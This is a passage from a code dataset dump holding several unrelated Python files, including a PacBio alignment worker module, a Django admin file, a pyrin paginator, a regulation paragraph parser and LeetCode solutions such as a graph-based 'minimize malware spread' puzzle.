    for resource_idx, ext_resource in enumerate(self.externalResources):
        path = urlparse(ext_resource.resourceId).path
        # Reuse a pre-loaded index for this resource when one was supplied.
        index = None if sharedIndices is None else sharedIndices[resource_idx]
        try:
            reader = openIndexedAlignmentFile(
                path,
                referenceFastaFname=refFile,
                sharedIndex=index)
        except (IOError, ValueError):
            log.info("pbi file missing for {f}, operating with "
                     "reduced speed and functionality".format(
                         f=path))
            reader = openAlignmentFile(path,
                                       referenceFastaFname=refFile)
        if not reader:
            raise IOError("{f} fails to open".format(f=path))
        self._openReaders.append(reader)
    log.debug("Done opening resources")
def _reopen (self):
    """
    Force re-opening of underlying alignment files, preserving the
    reference and indices if present, and return a copy of the
    AlignmentSet.  This is a workaround to allow us to share the index
    file(s) already loaded in memory while avoiding multiprocessing
    problems related to .bam files.
    """
    refFile = None
    if not self.isCmpH5:
        refFile = self._referenceFile
    newSet = copy.deepcopy(self)
    newSet._referenceFastaFname = refFile
    if not self.isCmpH5 and not self.hasPbi:
        # No index available: close the originals and let the copy
        # reopen through the normal (slower) code path.
        self.close()
        newSet._openFiles(refFile=refFile)
    else:
        # Grab the in-memory indices BEFORE closing, then hand them to
        # the copy so they are not reloaded from disk.
        indices = [ f.index for f in self.resourceReaders() ]
        self.close()
        _openFiles(newSet, refFile=refFile, sharedIndices=indices)
    return newSet
class Worker(object):
    """
    Base class for worker processes that read reference coordinates
    from the task queue, perform variant calling, then push results
    back to another queue, to be written to a GFF file by another
    process.

    All tasks that are O(genome length * coverage depth) should be
    distributed to Worker processes, leaving the ResultCollector
    process only O(genome length) work to do.
    """
    def __init__(self, options, workQueue, resultsQueue,
                 sharedAlignmentSet=None):
        # options: parsed command-line options; workQueue/resultsQueue:
        # multiprocessing queues; sharedAlignmentSet: optional AlignmentSet
        # whose indices are reused instead of reloading from disk.
        self.options = options
        self.daemon = True
        self._workQueue = workQueue
        self._resultsQueue = resultsQueue
        self._sharedAlignmentSet = sharedAlignmentSet
    def _run(self):
        """Main worker loop: open inputs, then consume chunks until the sentinel."""
        logging.info("Worker %s (PID=%d) started running" % (self.name, self.pid))
        if self._sharedAlignmentSet is not None:
            # XXX this will create an entirely new AlignmentSet object, but
            # keeping any indices already loaded into memory
            self.caseCmpH5 = _reopen(self._sharedAlignmentSet)
            # Drop our reference so the shared set can be reclaimed.
            self._sharedAlignmentSet = None
        else:
            warnings.warn("Shared AlignmentSet not used")
            self.caseCmpH5 = pbcore.io.AlignmentSet(self.options.infile,
                referenceFastaFname=self.options.reference)
        self.controlCmpH5 = None
        if not self.options.control is None:
            # We have a cmp.h5 with control values -- load that cmp.h5
            self.controlCmpH5 = pbcore.io.AlignmentSet(self.options.control,
                referenceFastaFname=self.options.reference)
        # NOTE(review): seeds only when randomSeed is None (fixed seed 42);
        # a user-supplied randomSeed is presumably applied elsewhere -- confirm.
        if self.options.randomSeed is None:
            np.random.seed(42)
        self.onStart()
        while True:
            if self.isTerminated():
                break
            chunkDesc = self._workQueue.get()
            if chunkDesc is None:
                # Sentinel indicating end of input.  Place a sentinel
                # on the results queue and end this worker process.
                self._resultsQueue.put(None)
                self._workQueue.task_done()
                break
            else:
                (chunkId, datum) = chunkDesc
                logging.info("Got chunk: (%s, %s) -- Process: %s" % (chunkId, str(datum), current_process()))
                result = self.onChunk(datum)
                logging.debug("Process %s: putting result." % current_process())
                self._resultsQueue.put((chunkId, result))
                self._workQueue.task_done()
        self.onFinish()
        logging.info("Process %s (PID=%d) done; exiting." % (self.name, self.pid))
    def run(self):
        # Make the workers run with lower priority -- hopefully the results writer will win
        # It is single threaded so it could become the bottleneck
        self._lowPriority()
        if self.options.doProfiling:
            # Write one cProfile dump per worker for offline inspection.
            cProfile.runctx("self._run()",
                            globals=globals(),
                            locals=locals(),
                            filename="profile-%s.out" % self.name)
        else:
            self._run()
    #==
    # Begin overridable interface
    #==
    def onStart(self):
        # Hook: called once before the first chunk is processed.
        pass
    def onChunk(self, target):
        """
        This function is the heart of the matter.

        referenceWindow, alnHits -> result
        """
        pass
    def onFinish(self):
        # Hook: called once after the sentinel is seen or termination is requested.
        pass
class WorkerProcess(Worker, Process):
    """Worker that executes as a process."""
    def __init__(self, *args, **kwds):
        Process.__init__(self)
        super(WorkerProcess, self).__init__(*args, **kwds)
        self.daemon = True
    def _lowPriority(self):
        """
        Set the priority of the process to below-normal.
        """
        import sys
        # sys.getwindowsversion() exists only on Windows builds of Python;
        # elsewhere the attribute lookup raises AttributeError.  Catch only
        # that (the previous bare `except:` swallowed every exception,
        # including KeyboardInterrupt/SystemExit).
        try:
            sys.getwindowsversion()
        except AttributeError:
            isWindows = False
        else:
            isWindows = True
        if isWindows:
            # Based on:
            #   "Recipe 496767: Set Process Priority In Windows" on ActiveState
            #   http://code.activestate.com/recipes/496767/
            import win32api
            import win32process
            import win32con
            pid = win32api.GetCurrentProcessId()
            handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, pid)
            win32process.SetPriorityClass(handle, win32process.BELOW_NORMAL_PRIORITY_CLASS)
        else:
            # POSIX: raise niceness by 10 (lower scheduling priority).
            os.nice(10)
    def isTerminated(self):
        # Processes are never cooperatively terminated; the sentinel on the
        # work queue is the only shutdown signal.
        return False
class WorkerThread(Worker, Thread):
    """Worker that executes as a thread (for debugging purposes only)."""
    def __init__(self, *args, **kwds):
        Thread.__init__(self)
        super(WorkerThread, self).__init__(*args, **kwds)
        # Event used for cooperative shutdown via terminate()/isTerminated().
        self._stop = Event()
        self.daemon = True
        # Mimic the multiprocessing.Process attribute so callers can treat
        # both worker flavors uniformly.
        self.exitcode = 0
    def terminate(self):
        # Request cooperative shutdown; the run loop polls isTerminated().
        self._stop.set()
    def isTerminated(self):
        return self._stop.isSet()
    @property
    def pid(self):
        # Threads have no PID of their own; -1 keeps log formats happy.
        return -1
    def _lowPriority(self):
        # Thread priority cannot be lowered portably; no-op by design.
        pass
| [
"[email protected]"
] | |
881b2796e754eccb435d9f1824561012eb3f9263 | 8308fa0e5f998e0aa6741af5720d6da99497060d | /estoque/admin.py | deb9bd5b8513f6c1109d2812a086ec45998d55fe | [] | no_license | gbpjr/sistema-estoque | 7aae11c657c555b98a329cdafde704504ef8b23a | 701471e593fa758a1da1b66fa279da4dd3d979e7 | refs/heads/master | 2020-04-23T08:37:35.123431 | 2019-02-24T21:43:14 | 2019-02-24T21:43:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | from django.contrib import admin
from .models import Local, Tipo, Fabricante, Componente
# Register the inventory models so they are manageable via the Django admin.
admin.site.register(Local)
admin.site.register(Tipo)
admin.site.register(Fabricante)
admin.site.register(Componente)
| [
"="
] | = |
eadbd701bc7fafb29b726f2330b241a74aad34d8 | 9cdfe7992090fb91696eec8d0a8ae15ee12efffe | /recursion/prob1221.py | 75de61d8cb82f1561f811ecae781765b333d2848 | [] | no_license | binchen15/leet-python | e62aab19f0c48fd2f20858a6a0d0508706ae21cc | e00cf94c5b86c8cca27e3bee69ad21e727b7679b | refs/heads/master | 2022-09-01T06:56:38.471879 | 2022-08-28T05:15:42 | 2022-08-28T05:15:42 | 243,564,799 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # 1221 Split string into Balanced Strings
class Solution(object):
    def balancedStringSplit(self, s):
        """
        Return the maximum number of balanced ('L'/'R' counts equal)
        substrings s can be split into.

        :type s: str
        :rtype: int
        """
        # Greedy single pass: every time the running L/R balance returns to
        # zero we can cut off one balanced substring.  This replaces the
        # previous recursive prefix scan, which was O(n^2) due to repeated
        # count() calls over every prefix.
        splits = 0
        balance = 0
        for ch in s:
            balance += 1 if ch == 'L' else -1
            if balance == 0:
                splits += 1
        return splits
    def isBalanced(self, sub):
        """Return True when sub contains equally many 'L' and 'R' characters."""
        return sub.count("L") == sub.count('R')
| [
"[email protected]"
] | |
31b90af5e2d762ee6482a7c0202484d4b2a0cff5 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/spaCy/2016/4/test_only_punct.py | 12c9580880eb988530171fcf1973e0dc5ca361fa | [
"MIT"
] | permissive | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 191 | py | from __future__ import unicode_literals
def test_only_pre1(en_tokenizer):
    # A lone opening bracket must tokenize to exactly one token.
    tokens = en_tokenizer("(")
    assert len(tokens) == 1
def test_only_pre2(en_tokenizer):
    # Two adjacent opening brackets must be split into two tokens.
    tokens = en_tokenizer("((")
    assert len(tokens) == 2
| [
"[email protected]"
] | |
0e9096e4b0553691cf5b1f21edf9dbdd5345cd3b | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/database/paging/paginator.py | 080a42e2616f9e7b4b8a7043c65bb37c92b2c6a9 | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 14,011 | py | # -*- coding: utf-8 -*-
"""
database paging paginator module.
"""
from copy import deepcopy
from abc import abstractmethod
from collections import OrderedDict
from flask import url_for
import pyrin.configuration.services as config_services
import pyrin.database.paging.services as paging_services
import pyrin.security.session.services as session_services
from pyrin.core.structs import CoreObject
from pyrin.core.exceptions import CoreNotImplementedError
from pyrin.database.orm.sql.schema.globals import BIG_INTEGER_MAX
from pyrin.database.paging.exceptions import PageSizeLimitError, TotalCountIsAlreadySetError
class PaginatorBase(CoreObject):
    """
    paginator base class.

    defines the abstract paging contract: page navigation, paging-key
    injection, item pagination and total-count bookkeeping. concrete
    paginators must implement every abstract member below.
    """
    @abstractmethod
    def next(self):
        """
        gets the next page number.

        returns None if there is no next page.

        :raises CoreNotImplementedError: core not implemented error.

        :rtype: int
        """
        raise CoreNotImplementedError()
    @abstractmethod
    def previous(self):
        """
        gets the previous page number.

        returns None if there is no previous page.

        :raises CoreNotImplementedError: core not implemented error.

        :rtype: int
        """
        raise CoreNotImplementedError()
    @abstractmethod
    def inject_paging_keys(self, values, **options):
        """
        injects paging keys into given values from given inputs.

        :param dict values: dict values to inject paging keys into it.

        :raises CoreNotImplementedError: core not implemented error.
        """
        raise CoreNotImplementedError()
    @abstractmethod
    def paginate(self, items, **options):
        """
        paginates the given items.

        it returns a tuple of two values, first value is a list of items
        to be returned to client, and second value is a dict of metadata
        to be injected into client response.

        :param list items: items to be paginated.

        :raises CoreNotImplementedError: core not implemented error.

        :returns: tuple[list items, dict metadata]
        :rtype: tuple[list, dict]
        """
        raise CoreNotImplementedError()
    @abstractmethod
    def has_next(self, count, *args, **options):
        """
        gets a value indicating that there is a next page available.

        it returns a tuple of two items. first item is a boolean indicating
        that there is a next page and the second item is the number of excess
        items that must be removed from end of items.

        :param int count: count of current items.

        :raises CoreNotImplementedError: core not implemented error.

        :returns: tuple[bool has_next, int excess]
        :rtype: tuple[bool, int]
        """
        raise CoreNotImplementedError()
    @abstractmethod
    def has_previous(self, count, *args, **options):
        """
        gets a value indicating that there is a previous page available.

        it returns a tuple of two items. first item is a boolean indicating
        that there is a previous page and the second item is the number of
        excess items that must be removed from beginning of items.

        :param int count: count of current items.

        :raises CoreNotImplementedError: core not implemented error.

        :returns: tuple[bool has_previous, int excess]
        :rtype: tuple[bool, int]
        """
        raise CoreNotImplementedError()
    def copy(self):
        """
        returns a deep copy of this instance.

        :rtype: PaginatorBase
        """
        return deepcopy(self)
    @property
    @abstractmethod
    def current_page(self):
        """
        gets current page number.

        :raises CoreNotImplementedError: core not implemented error.

        :rtype: int
        """
        raise CoreNotImplementedError()
    @property
    @abstractmethod
    def current_page_size(self):
        """
        gets current page size.

        :raises CoreNotImplementedError: core not implemented error.

        :rtype: int
        """
        raise CoreNotImplementedError()
    @property
    @abstractmethod
    def total_count(self):
        """
        gets the total count of items in all pages.

        :raises CoreNotImplementedError: core not implemented error.

        :rtype: int
        """
        raise CoreNotImplementedError()
    @total_count.setter
    @abstractmethod
    def total_count(self, value):
        """
        sets the total count of items in all pages.

        :param int value: total count to be set.

        :raises CoreNotImplementedError: core not implemented error.
        """
        raise CoreNotImplementedError()
class SimplePaginator(PaginatorBase):
    """
    simple paginator class.

    page numbers start from 1.
    it does not emit any extra queries to database to fetch count or like that.
    instead it over-fetches by two rows (one before, one after the page) and
    infers next/previous availability from the surplus.
    the only limitation is that it could not detect previous page in
    `last_page + 1` page.
    """

    def __init__(self, endpoint, **options):
        """
        initializes an instance of SimplePaginator.

        :param str endpoint: endpoint of route.

        :keyword int page_size: default page size.
                                if not provided, it will be get from
                                `default_page_size` of `database` config store.

        :keyword int max_page_size: max allowed page size.
                                    if not provided, it will be get from
                                    `max_page_size` of `database` config store.

        :raises PageSizeLimitError: page size limit error.
        """
        super().__init__()

        # clamp the per-endpoint max page size against the global limit.
        global_max_page_size = config_services.get('database', 'paging', 'max_page_size')
        max_page_size = options.get('max_page_size')
        if max_page_size is None or max_page_size < 1:
            max_page_size = global_max_page_size

        if max_page_size > global_max_page_size:
            raise PageSizeLimitError('Max page size [{max}] is bigger than global max page '
                                     'size which is [{global_max}] on endpoint [{endpoint}].'
                                     .format(max=max_page_size,
                                             global_max=global_max_page_size,
                                             endpoint=endpoint))

        # the default page size must also respect the endpoint's max.
        page_size = options.get('page_size')
        default_page_size = config_services.get('database', 'paging', 'default_page_size')
        if page_size is None or page_size < 1:
            page_size = min(default_page_size, max_page_size)

        if page_size > max_page_size:
            raise PageSizeLimitError('Page size [{page_size}] is bigger than max page size '
                                     'which is [{max}] on endpoint [{endpoint}].'
                                     .format(page_size=page_size,
                                             max=max_page_size,
                                             endpoint=endpoint))

        self._page_size = page_size
        self._max_page_size = max_page_size
        self._endpoint = endpoint
        # per-request state, populated by `inject_paging_keys`.
        self._limit = None
        self._offset = None
        self._current_page = None
        self._current_page_size = None
        self._has_next = False
        self._has_previous = False
        self._total_count = None

    def _url_for(self, page, page_size):
        """
        gets the url for given page number.

        the generated url keeps the current request's query strings and
        view args and only swaps in the new paging parameters.

        :param int page: page number to generate its url.
        :param int page_size: page size.

        :rtype: str
        """
        request = session_services.get_current_request()
        options = OrderedDict()
        options.update(request.get_all_query_strings())
        options.update(paging_services.generate_paging_params(page, page_size))
        options.update(request.view_args or {})
        options.update(_method=request.method)
        return url_for(self._endpoint, **options)

    def has_next(self, count, **options):
        """
        gets a value indicating that there is a next page available.

        it returns a tuple of two items. first item is a boolean indicating
        that there is a next page and the second item is the number of excess
        items that must be removed from end of items.

        :param int count: count of current items.

        :returns: tuple[bool has_next, int excess]
        :rtype: tuple[bool, int]
        """
        # the original limit is always 2 less than the current limit
        # (see `inject_paging_keys`, which over-fetches by 2 sentinel rows).
        excess = count - (self._limit - 2)
        if excess <= 0:
            self._has_next = False
            return self._has_next, 0
        if self._current_page == 1:
            # page 1 has no leading sentinel row, so any surplus means a next page.
            self._has_next = excess > 0
            return self._has_next, excess
        else:
            # on later pages one surplus row belongs to the previous page,
            # so a next page requires more than one extra row.
            self._has_next = excess > 1
            return self._has_next, excess - 1

    def has_previous(self, count, **options):
        """
        gets a value indicating that there is a previous page available.

        it returns a tuple of two items. first item is a boolean indicating
        that there is a previous page and the second item is the number of
        excess items that must be removed from beginning of items.

        :param int count: count of current items.

        :returns: tuple[bool has_previous, int excess]
        :rtype: tuple[bool, int]
        """
        # at any page, if there is a count > 0, it means that there is a previous
        # page available. because the first item is from the previous page
        # (the offset was shifted back by one in `inject_paging_keys`).
        if count <= 0 or self._current_page == 1:
            self._has_previous = False
            return self._has_previous, 0
        self._has_previous = True
        return self._has_previous, 1

    def next(self):
        """
        gets the url of the next page.

        returns None if there is no next page.

        :rtype: str
        """
        if self._has_next is True:
            return self._url_for(self._current_page + 1, self._current_page_size)
        return None

    def previous(self):
        """
        gets the url of the previous page.

        returns None if there is no previous page.

        :rtype: str
        """
        if self._has_previous is True:
            return self._url_for(self._current_page - 1, self._current_page_size)
        return None

    def inject_paging_keys(self, values, **options):
        """
        injects paging keys into given values from given inputs.

        invalid or missing page/page_size inputs are silently normalized
        into the valid range instead of raising.

        :param dict values: dict values to inject paging keys into it.

        :keyword int page: page number.
        :keyword int page_size: page size.
        """
        page, page_size = paging_services.get_paging_params(**options)
        if page is None or not isinstance(page, int) or page < 1:
            page = 1
        if page > BIG_INTEGER_MAX:
            page = BIG_INTEGER_MAX
        if page_size is None or not isinstance(page_size, int) or page_size < 1:
            page_size = self._page_size
        elif page_size > self._max_page_size:
            page_size = self._max_page_size

        # we increase limit by 2 to be able to detect if there is a next and previous page.
        # the extra items will not be returned to client.
        self._limit = page_size + 2
        offset = page - 1
        extra_offset = offset * page_size
        if extra_offset > BIG_INTEGER_MAX:
            extra_offset = BIG_INTEGER_MAX
        if extra_offset > 0:
            # we decrease offset by 1 to be able to detect if there is a previous page.
            # the extra item will not be returned to client.
            extra_offset = extra_offset - 1
        self._offset = extra_offset
        self._current_page = page
        self._current_page_size = page_size
        paging_services.inject_paging_keys(self._limit, self._offset, values)

    def paginate(self, items, **options):
        """
        paginates the given items.

        it returns a tuple of two values, first value is a list of items
        to be returned to client, and second value is a dict of metadata
        to be injected into client response.

        the sentinel rows that were over-fetched (see `inject_paging_keys`)
        are trimmed from both ends before the items are returned.

        :param list items: items to be paginated.

        :returns: tuple[list items, dict metadata]
        :rtype: tuple[list, dict]
        """
        metadata = OrderedDict()
        count = len(items)
        result = items
        has_next, excess_end = self.has_next(count)
        has_previous, excess_first = self.has_previous(count)
        if has_next is True:
            result = result[:-excess_end]
            count = count - excess_end
        if has_previous is True:
            result = result[excess_first:]
            count = count - excess_first

        next_url = self.next()
        previous_url = self.previous()
        if self.total_count is not None:
            metadata.update(count_total=self.total_count)
        metadata.update(count=count, next=next_url, previous=previous_url)
        return result, metadata

    @property
    def current_page(self):
        """
        gets current page number.

        :rtype: int
        """
        return self._current_page

    @property
    def current_page_size(self):
        """
        gets current page size.

        :rtype: int
        """
        return self._current_page_size

    @property
    def total_count(self):
        """
        gets the total count of items in all pages.

        :rtype: int
        """
        return self._total_count

    @total_count.setter
    def total_count(self, value):
        """
        sets the total count of items in all pages.

        the value is write-once per request; overwriting raises.

        :param int value: total count to be set.

        :raises TotalCountIsAlreadySetError: total count is already set error.
        """
        if self._total_count is not None:
            raise TotalCountIsAlreadySetError('Total count for paginator is already '
                                              'set and could not be overwritten in '
                                              'current request.')
        self._total_count = value
| [
"[email protected]"
] | |
47c3be1644c3b304105e0c662dc9f38ee860d001 | 9ecb6a1d3a71e7f87f3784af6b808f23a2abe348 | /drlhp/show_prefs.py | 4227c4f161eda839c7a5c5661322f9b2b12658a5 | [] | no_license | HumanCompatibleAI/interactive-behaviour-design | 13ae305b39d29595e8fd5907f8d9e9fa6c2efc16 | 226db7a55d64ce15edfb8d7b3352c7bf7b81b533 | refs/heads/master | 2020-05-02T16:54:02.232639 | 2019-08-08T14:29:11 | 2019-08-08T14:29:11 | 178,082,205 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | #!/usr/bin/env python3
"""
Display examples of the specified preference database
(with the preferred segment on the left,
and the non-preferred segment on the right;
equally-preferred pairs are displayed as well,
with the pair order matching a (0.0, 1.0) preference)
import argparse
import pickle
from multiprocessing import freeze_support
import numpy as np
from utils import VideoRenderer
def main():
    """Load a preference database from a pickle file and interactively
    display each preferred/non-preferred segment pair side by side."""
    parser = argparse.ArgumentParser()
    parser.add_argument("prefs", help=".pkl.gz file")
    args = parser.parse_args()

    with open(args.prefs, 'rb') as pkl_file:
        print("Loading preferences from '{}'...".format(args.prefs), end="")
        prefs = pickle.load(pkl_file)
        print("done!")

    print("{} preferences found".format(len(prefs)))
    print("(Preferred clip on the left)")

    v = VideoRenderer(zoom=2, mode=VideoRenderer.restart_on_get_mode)
    q = v.vid_queue

    prefs = prefs[0]  # The actual pickle file is a tuple of test, train DBs
    for k1, k2, pref in prefs.prefs:
        pref = tuple(pref)
        # arrange so the preferred segment ends up on the left (s1);
        # NOTE(review): equal preferences (0.5, 0.5) are displayed too,
        # using the same ordering as (0.0, 1.0).
        if pref == (0.0, 1.0) or pref == (0.5, 0.5):
            s1 = np.array(prefs.segments[k2])
            s2 = np.array(prefs.segments[k1])
        elif pref == (1.0, 0.0):
            s1 = np.array(prefs.segments[k1])
            s2 = np.array(prefs.segments[k2])
        else:
            raise Exception("Unexpected preference", pref)
        print("Preference", pref)
        vid = []
        height = s1[0].shape[0]
        # grey vertical separator between the two clips
        border = np.ones((height, 10), dtype=np.uint8) * 128
        for t in range(len(s1)):
            # -1 => select the last frame in the 4-frame stack
            f1 = s1[t, :, :, -1]
            f2 = s2[t, :, :, -1]
            frame = np.hstack((f1, border, f2))
            vid.append(frame)
        # hold the final frame briefly before the renderer loops
        n_pause_frames = 10
        for _ in range(n_pause_frames):
            vid.append(np.copy(vid[-1]))
        q.put(vid)
        input()  # wait for the user before showing the next pair
    v.stop()
if __name__ == '__main__':
    # freeze_support is required for multiprocessing on frozen Windows builds;
    # it is a no-op elsewhere.
    freeze_support()
    main()
| [
"[email protected]"
] | |
b5644533f4814bf76a438d3f873511d94ae32cb7 | ffedbe2d957677d65cb873d96482f1c94e74b988 | /regs/depth/paragraph.py | 4c7ad12fb53030d7ebe97823604eec9398cee496 | [] | no_license | cmc333333/Depth-Parser | b7602c158b6cb75179af90b78af93f28e547a3d2 | 4332b8c51e8e7d44b68985b3845b300d251af536 | refs/heads/master | 2020-05-20T12:09:03.662019 | 2013-04-16T20:37:56 | 2013-04-16T20:37:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,421 | py | import itertools
import re
from regs.depth import tree
from regs.search import segments
from regs.utils import roman_nums
import string
# Marker sequences for each paragraph nesting depth, outermost first:
# (a), (1), (i), (A).  Index into the outer list == depth.
p_levels = [
    list(string.ascii_lowercase),
    [str(i) for i in range(1, 51)],
    list(itertools.islice(roman_nums(), 0, 50)),
    list(string.ascii_uppercase),
    # Technically, there's italics (alpha) and (roman), but we aren't
    # handling that yet
]
class ParagraphParser():
    """Parses regulation text into a tree of nested paragraphs,
    using the marker sequences defined in ``p_levels``."""

    def __init__(self, p_regex, inner_label_fn):
        """p_regex is the regular expression used when searching through
        paragraphs. It should contain a %s for the next paragraph 'part'
        (e.g. 'a', 'A', '1', 'i', etc.) inner_label_fn is a function which
        takes the current label, and the next paragraph 'part' and produces
        a new label."""
        self.p_regex = p_regex
        self.inner_label_fn = inner_label_fn

    def matching_subparagraph_ids(self, p_level, paragraph):
        """Return a list of (depth, index) pairs for deeper levels whose
        marker collides with this paragraph's marker (e.g. letter (i) and
        roman numeral (i))."""
        matches = []
        for depth in range(p_level + 1, len(p_levels)):
            for sub_id, sub in enumerate(p_levels[depth]):
                if sub == p_levels[p_level][paragraph]:
                    matches.append((depth, sub_id))
        return matches

    def best_start(self, text, p_level, paragraph, starts, exclude=None):
        """Given a list of potential paragraph starts, pick the best based
        on knowledge of subparagraph structure. Do this by checking if the
        id following the subparagraph (e.g. ii) is between the first match
        and the second. If so, skip it, as that implies the first match was
        a subparagraph."""
        if exclude is None:
            exclude = []
        subparagraph_hazards = self.matching_subparagraph_ids(p_level,
                                                              paragraph)
        # sentinel entry so the last real candidate is also considered
        starts = starts + [(len(text), len(text))]
        for i in range(1, len(starts)):
            _, prev_end = starts[i - 1]
            next_start, _ = starts[i]
            s_text = text[prev_end:next_start]
            # shift excluded regions into the coordinates of the slice
            s_exclude = [(e_start + prev_end, e_end + prev_end)
                         for e_start, e_end in exclude]
            is_subparagraph = False
            for hazard_level, hazard_idx in subparagraph_hazards:
                if self.find_paragraph_start_match(s_text, hazard_level,
                                                   hazard_idx + 1, s_exclude):
                    is_subparagraph = True
            if not is_subparagraph:
                return starts[i - 1]

    def find_paragraph_start_match(self, text, p_level, paragraph, exclude=None):
        """Find the positions for the start and end of the requested label.
        p_level is one of 0,1,2,3; paragraph is the index within that level.
        Return None if not present. Does not return results in the exclude
        list (a list of start/stop indices)."""
        if exclude is None:
            exclude = []
        if len(p_levels) <= p_level or len(p_levels[p_level]) <= paragraph:
            return None
        match_starts = [(m.start(), m.end()) for m in re.finditer(
            self.p_regex % p_levels[p_level][paragraph], text)]
        # drop matches that overlap any excluded region
        match_starts = [(start, end) for start, end in match_starts
                        if all(end < es or start > ee for es, ee in exclude)]

        if not match_starts:
            return None
        if len(match_starts) == 1:
            return match_starts[0]
        return self.best_start(text, p_level, paragraph, match_starts,
                               exclude)

    def paragraph_offsets(self, text, p_level, paragraph, exclude=None):
        """Find the start/end of the requested paragraph. Assumes the text
        does not jump up a p_level -- see build_paragraph_tree below."""
        # exclude=None sentinel: a literal [] default would be a shared
        # mutable default argument.
        if exclude is None:
            exclude = []
        start = self.find_paragraph_start_match(text, p_level, paragraph,
                                                exclude)
        if start is None:
            return None
        id_start, id_end = start
        # search for the *next* sibling marker after this one to find the end
        end = self.find_paragraph_start_match(
            text[id_end:], p_level, paragraph + 1,
            [(e_start - id_end, e_end - id_end)
             for e_start, e_end in exclude])
        if end is None:
            end = len(text)
        else:
            end = end[0] + id_end
        return (id_start, end)

    def paragraphs(self, text, p_level, exclude=None):
        """Return a list of paragraph offsets defined by the level param."""
        if exclude is None:
            exclude = []

        def offsets_fn(remaining_text, p_idx, exclude):
            return self.paragraph_offsets(remaining_text, p_level, p_idx,
                                          exclude)
        return segments(text, offsets_fn, exclude)

    def build_paragraph_tree(self, text, p_level=0, exclude=None,
                             label=None):
        """
        Build a tree node to represent the text hierarchy.

        :param text: the text to parse.
        :param p_level: current nesting depth (index into ``p_levels``).
        :param exclude: list of (start, end) index pairs to ignore.
        :param label: label for the node being built; defaults to a fresh
            empty ``tree.label`` (computed per call -- the previous
            def-time default shared one mutable label across all calls).
        """
        if exclude is None:
            exclude = []
        if label is None:
            label = tree.label("", [])
        subparagraphs = self.paragraphs(text, p_level, exclude)
        if subparagraphs:
            body_text = text[0:subparagraphs[0][0]]
        else:
            body_text = text

        children = []
        for paragraph, (start, end) in enumerate(subparagraphs):
            new_text = text[start:end]
            # re-base excluded regions into the child's coordinates
            new_excludes = [(e[0] - start, e[1] - start) for e in exclude]
            new_label = self.inner_label_fn(label,
                                            p_levels[p_level][paragraph])
            children.append(self.build_paragraph_tree(new_text, p_level + 1,
                                                      new_excludes, new_label))
        return tree.node(body_text, children, label)
| [
"[email protected]"
] | |
9e51554a63ea745f2574b28165948e41f852a97e | a90aa4871684f6f24aa5b0daf2ece384418c748b | /basic/python/2_applica/1_scrapy/bloomfilter.py | 868227e7ae9f1616e4f5ff0e2650e336b69c8b7a | [] | no_license | Martians/code | fed5735b106963de79b18cc546624893665066cd | 653e2c595f4ac011aed7102ca26b842d4f6beaaf | refs/heads/master | 2021-07-11T19:22:24.858037 | 2019-02-22T13:04:55 | 2019-02-22T13:04:55 | 110,106,407 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py |
# https://media.readthedocs.org/pdf/pybloomfiltermmap3/latest/pybloomfiltermmap3.pdf
| [
"[email protected]"
] | |
4af2ccbccc3801bfd03ba5d348228bde9e7d5e13 | fd133e8252dc4ddb8221007f806da336639e9029 | /924_minimize_malware_speed.py | 9ebceeb1693f0f22ca3036256554fcb1d0d201ee | [] | no_license | nikrasiya/Graph-2 | ea331e8470a73eef2f70cbb71f28023f704f1ba2 | 4689f2e0d1a0847ab519715d7659939dad89e001 | refs/heads/master | 2021-05-17T16:21:17.539763 | 2020-04-06T13:18:31 | 2020-04-06T13:18:31 | 250,869,007 | 0 | 0 | null | 2020-03-28T18:44:58 | 2020-03-28T18:44:58 | null | UTF-8 | Python | false | false | 4,082 | py | from typing import List
from collections import defaultdict, Counter
class Solution:
    def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
        """
        https://leetcode.com/problems/minimize-malware-spread/

        Pick the initially-infected node whose removal saves the most nodes.
        Removing a node only helps when it is the *sole* infected node in its
        connected component (then the whole component is saved); among such
        nodes prefer the largest component, breaking ties by smallest index.
        If no component has exactly one infected node, return the smallest
        index in ``initial``.

        Time Complexity  - O(V*E): each component coloring scans full rows
                           of the adjacency matrix.
        Space Complexity - O(V)
        """
        n = len(graph)
        colors = self._color_components(graph, n)
        n_components = max(colors) + 1 if colors else 0

        # size of each component, and how many infected nodes it contains
        component_size = Counter(colors)
        infected_in = [0] * n_components
        for node in initial:
            infected_in[colors[node]] += 1

        best = float('inf')
        for node in initial:
            color = colors[node]
            if infected_in[color] == 1:
                if best == float('inf'):
                    best = node
                elif component_size[color] > component_size[colors[best]]:
                    best = node
                elif (component_size[color] == component_size[colors[best]]
                        and node < best):
                    best = node

        if best == float('inf'):
            return min(initial)
        return best

    def _color_components(self, graph, n):
        """Label every node with the id of its connected component.

        Uses an iterative DFS (the previous recursive version could hit
        Python's recursion limit on large, highly connected graphs).
        """
        colors = [-1] * n
        color = 0
        for start in range(n):
            if colors[start] != -1:
                continue
            stack = [start]
            colors[start] = color
            while stack:
                node = stack.pop()
                for neighbor in range(n):
                    if graph[node][neighbor] == 1 and colors[neighbor] == -1:
                        colors[neighbor] = color
                        stack.append(neighbor)
            color += 1
        return colors
if __name__ == '__main__':
    # Smoke-test cases; expected outputs per LeetCode 924 semantics
    # appear to be 1, 0, 0, 2, 3, 0 -- TODO confirm against the judge.
